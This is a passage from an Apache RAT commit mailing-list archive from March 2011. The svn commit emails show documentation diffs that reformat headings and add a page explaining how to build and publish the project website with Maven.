protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sun Mar 20 17:26:45 2011 New Revision: 1083516 URL: http://svn.apache.org/viewvc?rev=1083516&view=rev Log: Indent the paragraphs, so that they don't appear as headings. Modified: incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt Modified: incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt?rev=1083516&r1=1083515&r2=1083516&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt Sun Mar 20 17:26:45 2011 @@ -35,15 +35,15 @@ java -jar apache-rat-VERSION.jar --help working with. This will output a help message detailing the command line -options available to you. + options available to you. * Adding licence headers -RAT can be used to automatically add licence headers to -files that do not currently have them. Only files that -are not excluded by the RAT configurations will be affected. + RAT can be used to automatically add licence headers to + files that do not currently have them. Only files that + are not excluded by the RAT configurations will be affected. -To add licence headers use a command such as: + To add licence headers use a command such as: +------------------------------------------+ java -jar apache-rat-VERSION.jar --addLicence @@ -51,7 +51,7 @@ java -jar apache-rat-VERSION.jar --addLi /path/to/project +------------------------------------------+ -This command will add the licence header directly to the -source files. If you prefer to see which files will be -changed and how then remove the "--force" option. + This command will add the licence header directly to the + source files. If you prefer to see which files will be + changed and how then remove the "--force" option. From [email protected] Sun Mar 20 18:37:44 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48045 invoked from network); 20 Mar 2011 18:37:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Mar 2011 18:37:44 -0000 Received: (qmail 61378 invoked by uid 500); 20 Mar 2011 18:37:44 -0000 Delivered-To: [email protected] Received: (qmail 61354 invoked by uid 500); 20 Mar 2011 18:37:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61347 invoked by uid 99); 20 Mar 2011 18:37:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Mar 2011 18:37:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Mar 2011 18:37:41 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 593C523889E1; Sun, 20 Mar 2011 18:37:18 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083533 - /incubator/rat/main/trunk/src/site/apt/index.apt Date: Sun, 20 Mar 2011 18:37:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sun Mar 20 18:37:18 2011 New Revision: 1083533 URL: http://svn.apache.org/viewvc?rev=1083533&view=rev Log: Add one more level of headings. Modified: incubator/rat/main/trunk/src/site/apt/index.apt Modified: incubator/rat/main/trunk/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/index.apt?rev=1083533&r1=1083532&r2=1083533&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/src/site/apt/index.apt Sun Mar 20 18:37:18 2011 @@ -39,7 +39,7 @@ Release Audit Tool (RAT) describes the options available. The release notes describe the current state of RAT. -Checking Out RAT +* Checking Out RAT RAT contains a number of different products. @@ -49,7 +49,7 @@ Checking Out RAT svn co http://svn.apache.org/repos/asf/incubator/rat/main/trunk/ +------------------------------------------+ -Building RAT +* Building RAT Building RAT requires {{{http://maven.apache.org/} Apache Maven}}. @@ -63,9 +63,9 @@ mvn install <<<apache-rat/target/apache-rat-X.Y-SNAPSHOT.jar>>> where X and Y are the current major and minor version numbers. -Running RAT +* Running RAT -* Running from the Command Line +** Running from the Command Line Run from the command line with: @@ -79,7 +79,7 @@ java -jar apache-rat-VERSION.jar --help This will output a help message detailing the command line options available to you. -* Running with Apache Ant +** Running with Apache Ant RAT includes a task library for Ant 1.7. This allows RAT reports to be run against a wide variety of resources. See the file ant-task-examples.xml in @@ -88,7 +88,7 @@ java -jar apache-rat-VERSION.jar --help To use the Ant tasks, {{{http://ant.apache.org/} Apache Ant 1.7}} is required. -* Running with Apache Maven +** Running with Apache Maven RAT includes a plugin for Maven 2. This allows RAT reports to be run against a wide variety of resources. Details can be found in the From [email protected] Mon Mar 21 03:44:36 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71704 invoked from network); 21 Mar 2011 03:44:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 03:44:36 -0000 Received: (qmail 18559 invoked by uid 500); 21 Mar 2011 03:44:35 -0000 Delivered-To: [email protected] Received: (qmail 18536 invoked by uid 500); 21 Mar 2011 03:44:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18527 invoked by uid 99); 21 Mar 2011 03:44:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 03:44:34 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 03:44:32 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 48E9E23889DA; Mon, 21 Mar 2011 03:44:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083669 - in /incubator/rat/main/trunk/src/site: apt/site-publish.apt site.xml Date: Mon, 21 Mar 2011 03:44:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gmcdonald Date: Mon Mar 21 03:44:07 2011 New Revision: 1083669 URL: http://svn.apache.org/viewvc?rev=1083669&view=rev Log: Add minimal docs on how to publish the RAT website using Maven. Added: incubator/rat/main/trunk/src/site/apt/site-publish.apt (with props) Modified: incubator/rat/main/trunk/src/site/site.xml Added: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083669&view=auto ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (added) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 03:44:07 2011 @@ -0,0 +1,29 @@ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ Licensed under the Apache License, Version 2.0 (the "License"); +~~ you may not use this file except in compliance with the License. +~~ You may obtain a copy of the License at +~~ +~~ http://www.apache.org/licenses/LICENSE-2.0 +~~ +~~ Unless required by applicable law or agreed to in writing, software +~~ distributed under the License is distributed on an "AS IS" BASIS, +~~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +~~ See the License for the specific language governing permissions and +~~ limitations under the License. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -------------------- + Publishing this site + -------------------- + +How to publish the RAT website + + 1. Make your changes to the site xml and/or .apt files and commit. + 2. Buildbot automatically notices the commit and creates a staging site to look at - + See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. + 3. Need to make changes, no problem, go back to 1 and 2 as often as you like. + 4. Happy with changes and ready to go live? + Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + 5. Wait for the hourly site sync to our www machines and the updated site will be live. + + Propchange: incubator/rat/main/trunk/src/site/apt/site-publish.apt ------------------------------------------------------------------------------ svn:eol-style = native Modified: incubator/rat/main/trunk/src/site/site.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/site.xml?rev=1083669&r1=1083668&r2=1083669&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/site.xml (original) +++ incubator/rat/main/trunk/src/site/site.xml Mon Mar 21 03:44:07 2011 @@ -22,6 +22,10 @@ <item name="Changes" href="/RELEASE_NOTES.txt"/> </menu> + <menu name="Committer Info"> + <item name="Publish this site" href="site-publish.html"/> + </menu> + <menu ref="modules"/> <menu ref="reports"/> </body> From [email protected] Mon Mar 21 04:01:54 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35912 invoked from network); 21 Mar 2011 04:01:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 04:01:54 -0000 Received: (qmail 24608 invoked by uid 500); 21 Mar 2011 04:01:54 -0000 Delivered-To: [email protected] Received: (qmail 24583 invoked by uid 500); 21 Mar 2011 04:01:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24576 invoked by uid 99); 21 Mar 2011 04:01:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 04:01:53 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 04:01:53 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 883F6238896F; Mon, 21 Mar 2011 04:01:30 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083670 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 04:01:30 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: gmcdonald Date: Mon Mar 21 04:01:30 2011 New Revision: 1083670 URL: http://svn.apache.org/viewvc?rev=1083670&view=rev Log: attempt to tidy in apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083670&r1=1083669&r2=1083670&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 04:01:30 2011 @@ -15,15 +15,15 @@ Publishing this site -------------------- -How to publish the RAT website +* How to publish the RAT website - 1. Make your changes to the site xml and/or .apt files and commit. - 2. Buildbot automatically notices the commit and creates a staging site to look at - + * 1. Make your changes to the site xml and/or .apt files and commit. + * 2. Buildbot automatically notices the commit and creates a staging site to look at - See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. - 3. Need to make changes, no problem, go back to 1 and 2 as often as you like. - 4. Happy with changes and ready to go live? + * 3. Need to make changes, no problem, go back to 1 and 2 as often as you like. + * 4. Happy with changes and ready to go live? Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to /www/incubator.apache.org/rat/ on minotaur (people.apache.org). - 5. Wait for the hourly site sync to our www machines and the updated site will be live. + * 5. Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Mon Mar 21 04:26:16 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16589 invoked from network); 21 Mar 2011 04:26:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 04:26:16 -0000 Received: (qmail 40255 invoked by uid 500); 21 Mar 2011 04:26:15 -0000 Delivered-To: [email protected] Received: (qmail 40233 invoked by uid 500); 21 Mar 2011 04:26:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40222 invoked by uid 99); 21 Mar 2011 04:26:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 04:26:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 04:26:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 306B1238896F; Mon, 21 Mar 2011 04:25:46 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083672 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 04:25:46 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gmcdonald Date: Mon Mar 21 04:25:45 2011 New Revision: 1083672 URL: http://svn.apache.org/viewvc?rev=1083672&view=rev Log: attempt 3 Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083672&r1=1083671&r2=1083672&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 04:25:45 2011 @@ -17,13 +17,17 @@ * How to publish the RAT website - * 1. Make your changes to the site xml and/or .apt files and commit. - * 2. Buildbot automatically notices the commit and creates a staging site to look at - - See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. - * 3. Need to make changes, no problem, go back to 1 and 2 as often as you like. - * 4. Happy with changes and ready to go live? - Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to - /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + * Make your changes to the site xml and/or .apt files and commit. + + * Buildbot automatically notices the commit and creates a staging site to look at - + See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. + + * Need to make changes?, no problem, go back to 1 and 2 as often as you like. + + * Happy with changes and ready to go live? + Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + * 5. Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Mon Mar 21 05:09:46 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62350 invoked from network); 21 Mar 2011 05:09:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 05:09:45 -0000 Received: (qmail 53296 invoked by uid 500); 21 Mar 2011 05:09:45 -0000 Delivered-To: [email protected] Received: (qmail 53266 invoked by uid 500); 21 Mar 2011 05:09:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53259 invoked by uid 99); 21 Mar 2011 05:09:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 05:09:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 05:09:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4A19923888D2; Mon, 21 Mar 2011 05:09:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083673 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 05:09:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: gmcdonald Date: Mon Mar 21 05:09:12 2011 New Revision: 1083673 URL: http://svn.apache.org/viewvc?rev=1083673&view=rev Log: looks valid to me, but not showing up in the site Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083673&r1=1083672&r2=1083673&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 05:09:12 2011 @@ -15,19 +15,20 @@ Publishing this site -------------------- -* How to publish the RAT website +How to publish the RAT website - * Make your changes to the site xml and/or .apt files and commit. +* Make your changes to the site xml and/or .apt files and commit. - * Buildbot automatically notices the commit and creates a staging site to look at - - See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. +* Buildbot automatically notices the commit and creates a staging site to look at - + See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. - * Need to make changes?, no problem, go back to 1 and 2 as often as you like. +* Need to make changes?, no problem, go back to 1 and 2 as often as you like. - * Happy with changes and ready to go live? - Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to - /www/incubator.apache.org/rat/ on minotaur (people.apache.org). +* Happy with changes and ready to go live? - * 5. Wait for the hourly site sync to our www machines and the updated site will be live. + Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + +* Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Mon Mar 21 07:11:13 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59588 invoked from network); 21 Mar 2011 07:11:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 07:11:12 -0000 Received: (qmail 18303 invoked by uid 500); 21 Mar 2011 07:11:12 -0000 Delivered-To: [email protected] Received: (qmail 18279 invoked by uid 500); 21 Mar 2011 07:11:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18272 invoked by uid 99); 21 Mar 2011 07:11:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:11:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:11:12 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5E45423888E7; Mon, 21 Mar 2011 07:10:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083687 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 07:10:40 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: gmcdonald Date: Mon Mar 21 07:10:40 2011 New Revision: 1083687 URL: http://svn.apache.org/viewvc?rev=1083687&view=rev Log: tweaks Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083687&r1=1083686&r2=1083687&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 07:10:40 2011 @@ -17,18 +17,19 @@ How to publish the RAT website -* Make your changes to the site xml and/or .apt files and commit. + * Make your changes to the site xml and/or .apt files and commit. -* Buildbot automatically notices the commit and creates a staging site to look at - - See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. + * Buildbot automatically notices the commit and creates a staging site to look at - -* Need to make changes?, no problem, go back to 1 and 2 as often as you like. + See {{{http://ci.apache.org/projects/rat} http://ci.apache.org/projects/rat/}} which is always upto date within a minute of any commit. -* Happy with changes and ready to go live? + * Need to make changes?, no problem, go back to 1 and 2 as often as you like. - Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to - /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + * Happy with changes and ready to go live? -* Wait for the hourly site sync to our www machines and the updated site will be live. + Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + /www/incubator.apache.org/rat/ on minotaur (people.apache.org). + + * Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Mon Mar 21 07:19:14 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70590 invoked from network); 21 Mar 2011 07:19:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 07:19:14 -0000 Received: (qmail 20068 invoked by uid 500); 21 Mar 2011 07:19:14 -0000 Delivered-To: [email protected] Received: (qmail 20042 invoked by uid 500); 21 Mar 2011 07:19:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20035 invoked by uid 99); 21 Mar 2011 07:19:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:19:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:19:13 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BA97C23888CB; Mon, 21 Mar 2011 07:18:41 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083688 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 07:18:41 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: gmcdonald Date: Mon Mar 21 07:18:41 2011 New Revision: 1083688 URL: http://svn.apache.org/viewvc?rev=1083688&view=rev Log: tweak Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083688&r1=1083687&r2=1083688&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 07:18:41 2011 @@ -27,7 +27,7 @@ How to publish the RAT website * Happy with changes and ready to go live? - Do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + Do 'mvn site' then if successful do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to /www/incubator.apache.org/rat/ on minotaur (people.apache.org). * Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Mon Mar 21 07:26:32 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1566 invoked from network); 21 Mar 2011 07:26:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2011 07:26:32 -0000 Received: (qmail 21310 invoked by uid 500); 21 Mar 2011 07:26:32 -0000 Delivered-To: [email protected] Received: (qmail 21286 invoked by uid 500); 21 Mar 2011 07:26:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21279 invoked by uid 99); 21 Mar 2011 07:26:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:26:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Mar 2011 07:26:31 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 15A2723888E7; Mon, 21 Mar 2011 07:26:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083690 - /incubator/rat/main/trunk/src/site/apt/site-publish.apt Date: Mon, 21 Mar 2011 07:26:00 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: gmcdonald Date: Mon Mar 21 07:25:59 2011 New Revision: 1083690 URL: http://svn.apache.org/viewvc?rev=1083690&view=rev Log: looks like we are boxing commands, change to match Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt Modified: incubator/rat/main/trunk/src/site/apt/site-publish.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/site-publish.apt?rev=1083690&r1=1083689&r2=1083690&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/site-publish.apt (original) +++ incubator/rat/main/trunk/src/site/apt/site-publish.apt Mon Mar 21 07:25:59 2011 @@ -27,7 +27,19 @@ How to publish the RAT website * Happy with changes and ready to go live? - Do 'mvn site' then if successful do 'mvn site-deploy' from your local machine in the root of your RAT checkout, this will scp the site file to + Do + ++------------------------------------------+ +mvn site ++------------------------------------------+ + + then if successful do + ++------------------------------------------+ +mvn site-deploy ++------------------------------------------+ + + from your local machine in the root of your RAT checkout, this will scp the site file to /www/incubator.apache.org/rat/ on minotaur (people.apache.org). * Wait for the hourly site sync to our www machines and the updated site will be live. From [email protected] Tue Mar 29 04:24:40 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95215 invoked from network); 29 Mar 2011 04:24:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2011 04:24:40 -0000 Received: (qmail 78805 invoked by uid 500); 29 Mar 2011 04:24:40 -0000 Delivered-To: [email protected] Received: (qmail 78777 invoked by uid 500); 29 Mar 2011 04:24:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78770 invoked by uid 99); 29 Mar 2011 04:24:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 29 Mar 2011 04:24:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 29 Mar 2011 04:24:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3245F23888CD; Tue, 29 Mar 2011 04:24:16 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1086469 - /incubator/rat/main/trunk/pom.xml Date: Tue, 29 Mar 2011 04:24:16 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 